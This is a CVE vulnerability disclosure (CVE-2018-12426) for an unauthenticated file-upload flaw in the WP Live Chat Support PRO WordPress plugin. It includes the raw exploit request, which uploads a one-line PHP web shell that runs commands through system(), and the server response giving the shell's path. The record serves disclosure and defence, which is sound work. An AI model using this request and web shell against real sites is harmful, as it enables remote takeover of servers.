CVE-2018-12426
[Suggested description]
The WP live chat support PRO plugin before 8.0.07 for WordPress is
vulnerable to unauthenticated Remote Code Execution due to
client-side validation of allowed file types, as demonstrated by a
v1/remote_upload request with a .php filename and the image/jpeg
content type.
[Additional Information]
The following request was used to upload malicious files to the server:
POST /wp-json/wp_live_chat_support/v1/remote_upload HTTP/1.1
Host: localhost:8000
Cookie: wp-settings-1=mfold%3Do%26imgsize%3Dfull%26libraryContent%3Dbrowse; wp-settings-time-1=1523622040; wplc_chat_status=5;
... 7109443162421071041760069510
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: image/jpeg
<?php echo system($_GET["CMD"]); ?
... 7109443162421071041760069510
Content-Disposition: form-data; name="timestamp"
1528969272366
... 7109443162421071041760069510--
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////
The Response shows the file path where the file has been stored:
HTTP/1.1 200 OK
{"response":"http:\/\/localhost:8000\/wp-content\/uploads\/wp_live_chat\/\/pwn.php"}
[Vulnerability Type]
Insecure file-upload / Remote code execution
[Vendor of Product]
CodeCabin_ / WP-livechat
[Affected Product Code Base]
WP live chat support - PRO - All versions < 8.0.07
[Affected Component]
WP live chat support PRO - all versions < 8.0.07
[Attack Type]
Remote
[Impact Code execution]
true
[Attack Vectors]
The affected versions of WP live chat support PRO allow
unauthenticated users to upload files through the chat window. The
allowed file types (extensions) are validated by means of client side
constraints. An attacker that submits a POST request directly to the
endpoint which is responsible for the file-upload is able to bypass
the client-side constraints and upload malicious files to the target
server.
[Has vendor confirmed or acknowledged the vulnerability?]
true
[Discoverer]
Riccardo ten Cate
[Reference]
https://github.com/RiieCco/write-ups/tree/master/CVE-2018-12426